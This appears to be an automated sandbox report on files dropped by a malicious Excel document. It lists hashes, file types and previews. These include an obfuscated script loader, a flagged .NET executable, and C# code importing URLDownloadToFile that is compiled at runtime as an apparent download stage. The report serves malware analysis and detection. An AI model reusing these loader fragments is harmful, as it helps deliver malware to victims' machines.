                                    Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:276
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    File Type:PostScript document text
                                    Category:dropped
                                    Size (bytes):1035
                                    Entropy (8bit):5.1491631906969815
                                    Encrypted:false
                                    SSDEEP:24:kNid8HxPs3yTTtyid8OPgx4s3yTDH4id8HxPs3yTTtyid8OPgx4s3yTDHk:1kxPuyvt9Ngx4uyHjkxPuyvt9Ngx4uyE
                                    MD5:6D00E22D9EB30D348C37536576CF8FDA
                                    SHA1:9B25DC67FF07A375746574E8CAB4B04C2C6256D7
                                    SHA-256:3D5974589AB18957C2450C540A2267BEE0E5D8EAEAFD6E6363E6E2D62EA65D61
                                    SHA-512:84C4AB20B5888E6EFE631D4A9A17FF327C91876387AD299140E26FEB7565981473CC1C40FDAC5BA3A0A2FA623E2AA9E1041D44B55FF6E7E0635CE9E6E59AF313
                                    Malicious:false
                                    Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:276
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    File Type:PostScript document text
                                    Category:dropped
                                    Size (bytes):9566
                                    Entropy (8bit):5.22582439176908
                                    Encrypted:false
                                    SSDEEP:192:eXA2P6Y6f76yx626OP6H6Q6y6nfs6ttRZ69tsu6jtG16RMX05F5yLk:eQAt0zvXkdvIfsutRZEtsuutG1gMknR
                                    MD5:08A5FDC2402AAC9FBE78F16494554D5C
                                    SHA1:89C1122EF0773A6B771DCC3CB922B695C76F8B5D
                                    SHA-256:008774FEFB1299959D711144FAA84C18AC4A3920965EB671A1B94FF23BED5CD4
                                    SHA-512:BE83E0FA7C1D6EA6C14C1BA688DE832C6A18946B8A2F28EB8EE64882EB23710FAF6448F8361C77A9108F75FDAB921FFFCDF6E4BAE8C9CD2D154BFA0252D42479
                                    Malicious:false
                                    Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426595650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    File Type:PostScript document text
                                    Category:dropped
                                    Size (bytes):9566
                                    Entropy (8bit):5.22582439176908
                                    Encrypted:false
                                    SSDEEP:192:eXA2P6Y6f76yx626OP6H6Q6y6nfs6ttRZ69tsu6jtG16RMX05F5yLk:eQAt0zvXkdvIfsutRZEtsuutG1gMknR
                                    MD5:08A5FDC2402AAC9FBE78F16494554D5C
                                    SHA1:89C1122EF0773A6B771DCC3CB922B695C76F8B5D
                                    SHA-256:008774FEFB1299959D711144FAA84C18AC4A3920965EB671A1B94FF23BED5CD4
                                    SHA-512:BE83E0FA7C1D6EA6C14C1BA688DE832C6A18946B8A2F28EB8EE64882EB23710FAF6448F8361C77A9108F75FDAB921FFFCDF6E4BAE8C9CD2D154BFA0252D42479
                                    Malicious:false
                                    Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426595650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):113096
                                    Entropy (8bit):1.9807822014857486
                                    Encrypted:false
                                    SSDEEP:384:hNzyk+spBXiosQUYuoB7OdnGbLq+AtKzZQ9D+v+WyXG1oJ/+OE1ckdcWMuZBKh1:n
                                    MD5:3B8F1B6E5732868B048C91BCE2242936
                                    SHA1:D70763DB636757EFEC1C6BA2EB0FB16D0E8052BC
                                    SHA-256:893789B0A6331596EA36E905D166E020B7E1A2EB78C2A1189EFAF519D8DC2AE8
                                    SHA-512:480BA9442E42639782BFBCF1EC0ACAA58CF59DFFAB3DEB1AB06C5F43A99003CCFEBA3BCEEA2BF7E69BCDE8D29391D6F86F8DAF19BC0E31F2BD6F39CEFB3F778A
                                    Malicious:false
                                    Preview:Adobe Acrobat Reader DC 19.0....?A12_SelectObject.................................................................................................................................................~~~@~~~ ........................................................................................~~~.~~~.~~~.....................................................................................~~~.~~~.~~~.~~~`................................................................................~~~.~~~.~~~.~~~.~~~`............................................................................~~~.~~~.~~~.~~~.~~~.~~~@........................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~0....................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~0................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.............................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):15189
                                    Entropy (8bit):5.0343247648743
                                    Encrypted:false
                                    SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                    MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                    SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                    SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                    SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                    Malicious:false
                                    Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                    Category:modified
                                    Size (bytes):84878
                                    Entropy (8bit):2.7186555645985826
                                    Encrypted:false
                                    SSDEEP:96:Ea76Y++VQiIj4+kQiIjDUW+GDB/N8Tn+LU+ah4T0QiIjw9+GwT:EaJ++BIj4+uIjDDKr+Q+IIjG+GwT
                                    MD5:CCAE7CB0341D4C1A214D740F76EB99AE
                                    SHA1:9E4AB36A228CD69028C127BE21C1A7D12AF30294
                                    SHA-256:862835269BBD12FE394CDB9AB03E9E87D7117480150B7BC3A84DCF7EBEE3D1FE
                                    SHA-512:CDF5D552483289F1DC717618BF57ED3708FD9B6D73BF4D6E6B576E080B6D6598F404F96A059C1C897F2288B457F609CC965EEE046C31200EC569296B15DEFE07
                                    Malicious:true
                                    Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253C%2521DOCTYPE%2520html%253E%250A%253Cmeta%2520http-equiv%253D%2522X-UA-Compatible%2522%2520content%253D%2522IE%253DEmulateIE8%2522%2520%253E%250A%253Chtml%253E%250A%253Cbody%253E%250A%253CsCriPt%2520TyPE%253D%2522Text/vBSCripT%2522%253E%250ADIm%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%25
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):786432
                                    Entropy (8bit):7.843829192750069
                                    Encrypted:false
                                    SSDEEP:12288:ClQAuzVwg6o8jReYXggj/mkYfUu3lu/mMDtXWwQS/alvl7s66nIEAvhgquWfaOrJ:g53voIeauFcoymiXW485s66n+vhgk
                                    MD5:D02CC222E09FD373FAF4030AC735618C
                                    SHA1:9D56352E325A466837CA7C0657697F1C00E4D440
                                    SHA-256:A21299AF73C18F0D903F023BB82D10796F876335281059355EA3B8D72DDB1DD8
                                    SHA-512:FD475E9E20B03ECE2D0211092A86B3FC1D286E336CCE3354AE400B53DD77B82B3511E8742AB4F36F99C106ADC7A288029FDD113460652924D591A0CF7E56C8ED
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 42%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V.f................................. ........@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............,...........................................................0..A....... P........%.....(......... B........%.1...(.....2...(....*.....&*....~....*........*.~....*........*".(.....*....0..{.............%.....(.................. ....... c,..... .:..... .6..... 5...... .6..... . ..... ......................(....*.....&*..0..........~2.....~........E........................~....:......$...Y.+......(....%.(.........E....'.......!...'...=...L...~....-...P.....Y..+....v
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                    Category:dropped
                                    Size (bytes):1698632
                                    Entropy (8bit):4.178150141850063
                                    Encrypted:false
                                    SSDEEP:12288:aD8dt3iGnjPjIwEasrwvAWXKcnXfxpwZasUkRaNHH/o1PWwnReyJ0yJS:aat3wwKuWh1OwIyJ0yJS
                                    MD5:0C11DB01DB641A918504A88CF5B57B89
                                    SHA1:36FA3693E0C9F4AB1A3FAD7288D47ABF6E176FDA
                                    SHA-256:D75C7858AE64041B2BB868D53CE0BC968700F373FFCF2710BBB088C3A7C24E28
                                    SHA-512:06082B5E101887F9522E0066A99D289550276CBC862A9D409A5F152E4682B0936BC526A0B40C874410A2C1188788414D56B2B63774990B726FD0C0C7879B7548
                                    Malicious:false
                                    Preview:....l...........P... ...........A_..+J.. EMF....H...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!...........................T...L.......................UU.A&..A............L.......................L..."...........!...............................................Q...!..."...........!...............................
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                    Category:dropped
                                    Size (bytes):1454420
                                    Entropy (8bit):0.786650365290048
                                    Encrypted:false
                                    SSDEEP:1536:yQ+kTwekfmcmpVItFGg1sydMfc3Xa8NQLY6YCO7wdBAHsE3zQxB:yGT9ymOtAg2CMQa8NQYwdyHsEDQxB
                                    MD5:B09A692DB44B02101C026B2FDFB62A24
                                    SHA1:20C66D03632BEBD449A8E2C86C23A6E09409E979
                                    SHA-256:7E978D8B2CE6502CC002F3E1BE6F894AF947F47E14CF0751D525FEE41D32713B
                                    SHA-512:55C982555C7A4C2D430D9EF9EB10CA0D16B31E706CB99DE02CFF63042B2B2DCDE15DCB33DB0755F0474C3275F126B607939B2BD935C4AC8B4DB78C193DE9BB04
                                    Malicious:false
                                    Preview:....l...........c................*...7.. EMF....T1..........................8...X....................?...........................................*...7..........d.......Q....0..........c.......................d.......P...(...x... 0...... ....*...7..(...d............... 0..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Aug 13 18:24:35 2024, 1st section name ".debug$S"
                                    Category:dropped
                                    Size (bytes):1328
                                    Entropy (8bit):3.985444553968238
                                    Encrypted:false
                                    SSDEEP:24:HOe9E2UeKRadHWwKdNWI+ycuZhNbNakSCCPNnqSqd:m7MVKd41ulbNa3COqSK
                                    MD5:47B98DBF472DD79A96F6227B99245BA0
                                    SHA1:1DF7F7C6A1F9721281E33E2FD84DFA6EB7868BBC
                                    SHA-256:E743A0AFD807A80C9B4FFAD8D21F41CD71D652C4EC07FC8AB9C38B2C58BF7B37
                                    SHA-512:D472BE6A0F38794BB87C427EE43FA08D569AA036E3176482B659D1B1EE831A14C6CE0E0B8F462C028199483F6CC01627114CB97AA7F63CCA5A20B7949C9774D3
                                    Malicious:false
                                    Preview:L....f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\d1xzy0xm\CSCCF15997BD6B546CEB43AF983F4CD5CA2.TMP...............4Pla...l.I6yX..C..........4.......C:\Users\user\AppData\Local\Temp\RES4D56.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.1.x.z.y.0.x.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):652
                                    Entropy (8bit):3.1093469727750858
                                    Encrypted:false
                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhdn3ak7YnqqCdngPN5Dlq5J:+RI+ycuZhNbNakSCCPNnqX
                                    MD5:34506C61ADC4116CE2493679580DBF43
                                    SHA1:8E1AE31538337EB7D87EAE2E674C5D57D40C7785
                                    SHA-256:27187E9C2DD8CC34489719469EAED9C5BB33A4B92BEE0A089C34D7F3CBBDFE73
                                    SHA-512:AAE9895FAD3675D8748F52814F0A3B60DF70C2E24C8C88D1773E9653D988B8899EE7C74C03FB4807E5DAEA2CBE8043567A6D6122E59A83FA4FF4D879D14AA860
                                    Malicious:false
                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.1.x.z.y.0.x.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.1.x.z.y.0.x.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (341)
                                    Category:dropped
                                    Size (bytes):463
                                    Entropy (8bit):3.7579094575114596
                                    Encrypted:false
                                    SSDEEP:6:V/DsYLDS81zuPOaUiT+HMGpQXReKJ8SRHy4HfSrsKjDIy:V/DTLDfuJ9KuXfH7YDIy
                                    MD5:CDE292FA49D59EF6BD151091CB0680CD
                                    SHA1:153CF0C126D36E6F138FA4FA8A125D584E5A0B5B
                                    SHA-256:E71092DFC49A5D6595C74298767A6EC1566EDBDA6D5DD475ADF82FBD841521C4
                                    SHA-512:78C5635D3AE86D147D97B85193950C4A3773ABB557E3819117A99AB9730AAE635F6F9D68E065745713D2DF7E3790EA7FFB9825D106408575C48D50CCE762CA60
                                    Malicious:false
                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace lkykWDexh.{. public class YVvFVyRtN. {. [DllImport("urlMoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr sCluBEMo,string j,string CIU,uint cn,IntPtr IGjD);.. }..}.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                    Category:dropped
                                    Size (bytes):369
                                    Entropy (8bit):5.267241168860402
                                    Encrypted:false
                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f1EJZzxs7+AEszIP23f1EJyLGA:p37Lvkmb6Kz94ZWZEo94yyA
                                    MD5:532E3C2B3B8AC76C90CCBFCF09F9291E
                                    SHA1:BE7374B8521EE2FA975D60CC0C7628BE33E2893A
                                    SHA-256:9D031C6D240CB1B98D1AAFCD2C1CEB3500846C74DEA24A2327831C20B19522AD
                                    SHA-512:F00FE356ED3BB2108E7D4FF1008017824549C4A08E4EBBCD25DF49821FAD6CE16224C73666D6A1495182DEDFB8A0B347E83C2F87989CA8594B76E869534EEEB0
                                    Malicious:true
                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.0.cs"
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3072
                                    Entropy (8bit):2.810581437772162
                                    Encrypted:false
                                    SSDEEP:24:etGS0PBu5exl8e6WkE8wwRMl2tkZflmyLjcUWI+ycuZhNbNakSCCPNnq:6rsx+e648wgMl5JlLA31ulbNa3COq
                                    MD5:FCC2789C51810A4FDA1CCC5EEE04428B
                                    SHA1:5FF267A786464E2F8C097D83B8812F0F38ACDD18
                                    SHA-256:8424E2D83A48C1D1FFF50982A45495FBD7FC49B4C0358A24A10729ACD8A775FD
                                    SHA-512:0810D2380C1CF60D2BB730D8D4B90A7CE2658C7A4FA797504CF93A334D5EFA66969B41463AE9BE28193C38FDB9C6E19834F4ED85B7DC2A66B83A26C19D150AB5
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4.....q.....q...........................!.............. B.....P ......T.........Z.....c.....e.....i.....l...T.....T...!.T.....T.......!.....*.......B.......................................+..........<Module>.d1
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):866
                                    Entropy (8bit):5.367256542863961
                                    Encrypted:false
                                    SSDEEP:24:AId3ka6KzDEoZy1KaMD5DqBVKVrdFAMBJTH:Akka60DEoM1KdDcVKdBJj
                                    MD5:667C0D47B3C5A36BB85AF5E6720810E2
                                    SHA1:C78220C927DE8B3D16CC38ADEED5CC55959D3271
                                    SHA-256:87433CD3242464F65729C4CE37810948B9CE6A32BBB21031D0D5AF03DFB8728C
                                    SHA-512:EC7320C9050370BE1B4A17DDA639277C213641F25BCF7FD29CCA524DAA8C13814F1F4521E514EFB1B1908BA63911EE03D3A5CEC3BD949048F761516FBA202A2B
                                    Malicious:false
                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Users\user\AppData\Roaming\sihost.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1574
                                    Entropy (8bit):5.113897866737485
